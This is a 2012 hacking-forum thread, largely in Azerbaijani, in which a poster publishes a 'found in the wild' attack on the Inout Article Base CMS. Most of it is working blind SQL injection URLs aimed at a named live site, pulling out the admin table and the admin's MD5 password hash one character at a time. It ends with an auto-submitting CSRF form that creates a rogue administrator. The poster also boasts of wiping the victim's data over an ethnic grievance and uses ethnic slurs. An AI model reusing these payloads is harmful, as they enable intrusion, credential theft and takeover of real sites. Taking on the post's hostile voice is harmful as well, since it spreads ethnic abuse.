Anti-armenia.ORG - Forumlar - Inout Article Base Ultimate Version:

Forumlar / Hacking Platform / Exploits & Vulnerabilities / Inout Article Base Ultimate Version: < 2 0day

Istifadəçi

2012-10-21 02:49 GMT

BlackMinD

Pr0grammer

Mesaj Sayı : 1677

Mövzu Sayı :

Rep Ver :

Rep Sayı : 62

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər : KARABAKH IS AZERBAIJAN!

Ölkə :

Məslək :

Yaş :

Mesaj :

Bu da xaçiklərin bu skriptdə istifadə edən saytlarında owned edilməsi + resellerini təpələməyim))

http://pastebin.com/kSFhuM4a

Bu vulnun ən axmaq cəhəti o idiki SQL error verirdi sintaksisi görürdüm gəlki heç cürə dartıb çıxartmaq olmurdu.
İstər error based istər normal.
Belə yol seçdim.

Kod:
==============================================================================
Vulnerable Software: Inout Article Base Ultimate Version: < 2
Vulnerabilities: Blind SQLi && CROSS Site Request Forgery.
Discovered and Exploited in Wild
Vendor: inoutscripts.com
==============================================================================

About software version:
==============================================================================
I can't say what exact version affected but:(it is probably version < 2.0))
Here is what it's Upgrade.html says:
*Inout ArticleBase-Upgradtion to version 2.0*
If you are currently using old version of Inout ArticleBase and want to upgrade
to version 2.0 of Inout ArticleBase, please follow the instructions given below.
etc...
==============================================================================

====FIRST OF ALL=====*WE NEVER ATTACK WITHOUT REASON*=====SO WE HAVE REASON=====
1) To owner of this "sites" + to owner of this reseller account:
Next time be carefull when creating domains like "azik.com".(Calling Azerbaijanians "azik" ?)
http://whoissoft.com/azik.com
If yes: We are happy to announce that: We OwNed you especially for this.And obviously we "rm"-ned + dropped everything there as we found.
I'm sure: you are a bit lucky because we are going to disclosure how we owned you through new vulnerabilities discovered by us in cms called
"Inout Article Base Ultimate".

And finally: Hereis some awesome "wallpapers" for you.uSE AND eNJOY.LoL

wallpaper 1: http://s017.radikal.ru/i431/1210/8e/fc0d87d0e858.png
wallpaper 2: http://s60.radikal.ru/i167/1210/55/9da556f007a5.png

===============================================================================

=========================VULNERABLE CODE=======================================
//controller/ViewController.class.php

function getarticlecount($cid)
{
$cat= $this->getSubcategoryList($cid);

$this->loadLibrary("settings");
$set=new settings("nesote_inoutarticle_settings");
$set->loadValues();
$show_articles=$set->getValue("show_ articles_selected_language");
$lang_id=$this->getlang_id();
if($show_articles==1)
$languagecondition="and lang_id='".$lang_id."'";
else
$languagecondition="";

//echo $parent;
$db= new NesoteDALController();
if($cat!=null)
{
$len=strlen($cat);
$cat=substr($cat,0,($len-2));
}
else
$cat="'".$cid."'";
$total=$db->total(array("c"=>"nesote_inoutarticle_categories","a"=>"nesote_inoutarticle_articles"),"a.cid=c.id and a.cid in($cat) and a.status=? and c.status=? $languagecondition",array(1,1));
// echo $db->getQuery();
return $total;

}

===============================================================================

================================EXPLOITATION===================================

On TRUE returns: normal page to articles.
On FALSE returns: No article posted yet.

//TRUE verir bu.
www.hanragitaran.com/view/categories/1') or (select if(count(table_name)!='0',sleep(10),0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

www.hanragitaran.com/view/categories/1') or (select if(count(table_name)='1',sleep(10),0) from information_schema.columns where column_name='password' and table_schema=database() limit 1 offset 0)-- and 8=('8

http://www.hanragitaran.com/view/categories/1') or (select if(count(table_name)!='0',sleep(10),0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

www.hanragitaran.com/view/categories/1') or (select if(length(table_name)!='0',sleep(10),0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

www.hanragitaran.com/view/categories/1') or (select if(substr(table_name,1,1)='i',sleep(10),0) from information_schema.columns where column_name='password' and table_schema=database() limit 1 offset 0)-- and 8=('8

http://www.hanragitaran.com/view/categories/1') or (select if(substr(table_name,1,1)='e',benchmark(10000000,md5(1)),0) from information_schema.columns where column_name='password' and table_schema=database() limit 1 offset 0)-- and 8=('8

http://www.hanragitaran.com/view/categories/1') and (select if('a'='ab',1,0))-- and 8=('8

TRUE DA xeberlerli sehife

false-de

No article posted yet.

AND logical ile.

password adli column burda olmalidir:

//TRUE

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,1,1)='c',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

1-CI SIMVOL c
2-ci simvol: l

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,2,1)='l',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

3-de: a

www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,3,1)='a',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

4-de s

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,4,1)='s',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

5-de: s

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,5,1)='s',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

6-da i

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,6,1)='i',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

7-de f

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,7,1)='f',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

8-de i

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,8,1)='i',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

9-da e

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,9,1)='e',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

10-da d

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,10,1)='d',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

11-de s

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,11,1)='s',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

12-de _

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,12,1)='_',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

hal hazirda classifieds_

13-de: n

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,13,1)='n',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

classifieds_n

http://www.hanragitaran.com/view/categories/1') and (select if(length(table_name)='46',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

46 simvol! Burda deyiblere anovu sikim ermeni!!!!!!!!!!!

Sikdirdi bu table baxaq basqasina.

======================================================

24-e qeder cixmir

http://www.hanragitaran.com/view/categories/1') and (select if(count(table_name)!='0',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1 offset 25)-- and 8=('8

14-cu simvol: e

15-ci simvol: s

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,15,1)='s',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

16-ci simvol: o

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,16,1)='o',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

17-ci simvol: t

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,17,1)='t',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

18-ci simvol: e

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,18,1)='e',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

davamini gedek gorek ne verir.

19-da _ olmalidir yoxlayaq yene de.

duzdur

19-cu simvol: _

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,19,1)='_',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

20-ci simvol: i

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,20,1)='i',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

21-ci simvol: n

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,21,1)='n',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

22-ci simvol: o

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,22,1)='o',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

23-cu simvol: u

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,23,1)='u',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

24-cu simvol: t

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,24,1)='t',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

25-ci simvol: a

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,25,1)='a',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

26-ci simvol: r

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,26,1)='r',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

27-ci simvol: t

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,27,1)='t',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

28-ci simvol: i

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,28,1)='i',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

29-cu simvol: c

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,29,1)='c',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

30-cu simvol: l

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,30,1)='l',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

31-ci simvol: e

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,31,1)='e',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

32-ci simvol: _

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,32,1)='_',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

33-cu simvol: a

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,33,1)='a',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

34-cu simvol: d

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,34,1)='d',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

deyesen adminlikdir burda duz cixiriq ustune artiq.

35-ci simvol: m

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,35,1)='m',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

36-ci simvol: i

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,36,1)='i',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

37-ci simvol: n

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,37,1)='n',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

38-ci simvol: i

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,38,1)='i',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

39-cu simvol: s

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,39,1)='s',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

40-ci simvol: t

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,40,1)='t',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

41-ci simvol: r

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,41,1)='r',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

42-ci simvol: a

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,42,1)='a',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

43-cu simvol: t

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,43,1)='t',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

44-cu simvol: o

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,44,1)='o',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

45-ci simvol: r

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,45,1)='r',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

46-ci simvol: s

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,46,1)='s',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

Bu axirinci simvol idi cunki TRUE qaytardi yoxlanis:

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,46,100)='s',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

table_name-i yigaq.

mysql> select length('classifieds_nesote_inoutarticle_administrators') \g
----------------------------------------------------------
| length('classifieds_nesote_inoutarticle_administrators') |
----------------------------------------------------------
| 46 |
----------------------------------------------------------
1 row in set (0.00 sec)

mysql>

//TRUE

http://www.hanragitaran.com/view/categories/1') and (select if(substr(table_name,1,100)='classifieds_nesote_inoutarticle_administrators',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

burda bizde username
id
password columnlari var.

Oxay bavan qurban 1 username var burda 100% adminlikdir)))))))

http://www.hanragitaran.com/view/categories/1') and (select if(count(username)='1',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC)-- and 8=('8

//TRUE

http://www.hanragitaran.com/view/categories/1') and (select if(substr(username,1,10)='admin',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

menasiz idi amma yene de 100 olcek bir bicek

//TRUE
http://www.hanragitaran.com/view/categories/1') and (select if(length(username)='5',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

MD5-dir pass:

http://www.hanragitaran.com/view/categories/1') and (select if(length(password)='32',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

Cekek getsin naxuy:

========================================================
qancigin parolunun md5-i nin 1ci simvolu:
1-ci simvol: f

//TRUE
http://www.hanragitaran.com/view/categories/1') and (select if(substr(password,1,1)='f',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================

2-ci simvol: 8

http://www.hanragitaran.com/view/categories/1') and (select if(substr(password,2,1)='8',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================

3-cu simvol: c

http://www.hanragitaran.com/view/categories/1') and (select if(substr(password,3,1)='c',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================

4-cu simvol: b

http://www.hanragitaran.com/view/categories/1') and (select if(substr(password,4,1)='b',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================

5-ci simvol: e

http://www.hanragitaran.com/view/categories/1') and (select if(substr(password,5,1)='e',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================

6-ci simvol: 6

http://www.hanragitaran.com/view/categories/1') and (select if(substr(password,6,1)='6',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================
7-ci simvol: 3

http://www.hanragitaran.com/view/categories/1') and (select if(substr(password,7,1)='3',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================
8-ci simvol: 7

http://www.hanragitaran.com/view/categories/1') and (select if(substr(password,8,1)='7',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================
9-cu simvol: 1

http://www.hanragitaran.com/view/categories/1') and (select if(substr(password,9,1)='1',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================

10-cu simvol: 6

http://www.hanragitaran.com/view/categories/1') and (select if(substr(password,10,1)='6',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================

11-ci simvol: 4

http://www.hanragitaran.com/view/categories/1') and (select if(substr(password,11,1)='4',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================

12-ci simvol: 2

http://www.hanragitaran.com/view/categories/1') and (select if(substr(password,12,1)='2',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================
13-cu simvol: 5

http://www.hanragitaran.com/view/categories/1') and (select if(substr(password,13,1)='5',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================
14-cu simvol: 4

http://www.hanragitaran.com/view/categories/1') and (select if(substr(password,14,1)='4',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================
15-ci simvol: 4

http://www.hanragitaran.com/view/categories/1') and (select if(substr(password,15,1)='4',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================

16-ci simvol: 6

http://www.hanragitaran.com/view/categories/1') and (select if(substr(password,16,1)='6',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================

17-ci simvol: 2

http://www.hanragitaran.com/view/categories/1') and (select if(substr(password,17,1)='2',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================
18-ci simvol: 9

http://www.hanragitaran.com/view/categories/1') and (select if(substr(password,18,1)='9',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================
19-ci simvol: 5

http://www.hanragitaran.com/view/categories/1') and (select if(substr(password,19,1)='5',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================

20-ci simvol: 2

http://www.hanragitaran.com/view/categories/1') and (select if(substr(password,20,1)='2',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================

21-ci simvol: f

http://www.hanragitaran.com/view/categories/1') and (select if(substr(password,21,1)='f',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8
========================================================

22-ci simvol: d

http://www.hanragitaran.com/view/categories/1') and (select if(substr(password,22,1)='d',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================
23-cu simvol: a

http://www.hanragitaran.com/view/categories/1') and (select if(substr(password,23,1)='a',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================

24-cu simvol: 4

http://www.hanragitaran.com/view/categories/1') and (select if(substr(password,24,1)='4',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================

25-ci simvol: c

http://www.hanragitaran.com/view/categories/1') and (select if(substr(password,25,1)='c',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================

26-ci simvol: e

http://www.hanragitaran.com/view/categories/1') and (select if(substr(password,26,1)='e',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================

27-ci simvol: 2

http://www.hanragitaran.com/view/categories/1') and (select if(substr(password,27,1)='2',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================
28-ci simvol: 3

http://www.hanragitaran.com/view/categories/1') and (select if(substr(password,28,1)='3',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================

29-cu simvol: 9

http://www.hanragitaran.com/view/categories/1') and (select if(substr(password,29,1)='9',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================
30-cu simvol: 8

http://www.hanragitaran.com/view/categories/1') and (select if(substr(password,30,1)='8',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================
31-ci simvol: e

http://www.hanragitaran.com/view/categories/1') and (select if(substr(password,31,1)='e',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================
32-ci simvol: 0

http://www.hanragitaran.com/view/categories/1') and (select if(substr(password,32,1)='0',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================

CSRF add admin:

username: blackhatz
password: blackhatz
email: blackhatz@blackhatz.tld

<body onload="javascript:document.forms[0].submit()">
<form name="addsubadmin" id="addsubadmin" enctype="multipart/form-data" method="POST" action="http://www.hanragitaran.com/admin/permissions/addsubadminprocess">
<input name="username" type="text" id="username" value="blackhatz">
<input name="name" type="text" id="name" value="blackhatz">
<input name="password" type="password" id="password" value="blackhatz">
<input name="cpassword" type="password" id="cpassword" value="blackhatz">
<input name="email" type="text" id="email" value="blackhatz@blackhatz.tld">
<select name="gid" id="gid" >
<option value="1"></option>
<option value="1">admins selected="selected"</option>
</select>
<input name="pid" type="hidden" id="pid" value="{$pid}">

</form>

================ THE END =====================

================================================

SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS:
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
osvdb.com
websecurity.com.ua

to all Aa Team + to all Azerbaijan Black HatZ +
*Especially to my bro CAMOUFL4G3 *
Also special thanks to: ottoman38 & HERO_AZE
================================================

/AkaStep

Ana VƏTƏN!

Anti-armenia.ORG

Istifadəçi

2012-10-21 08:26 GMT

Ferid23

Admin

Mesaj Sayı : 1875

Mövzu Sayı :

Rep Ver :

Rep Sayı : 45

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər : Anti-armenia.ORG

Ölkə :

Məslək : Programmer & Defacer

Yaş : 12

Mesaj :

Təbrik

AZ Domaini İhbar Hattı (Azərbaycan saytlarında olan boşluqları bizə bildirin): http://anti-armenia.org/forums.php?m=posts&q=572
Qaydalar (Saytın qayda-qanunlarını oxuyaraq əməl edin)

Anti-armenia.ORG

Istifadəçi

2012-10-21 13:36 GMT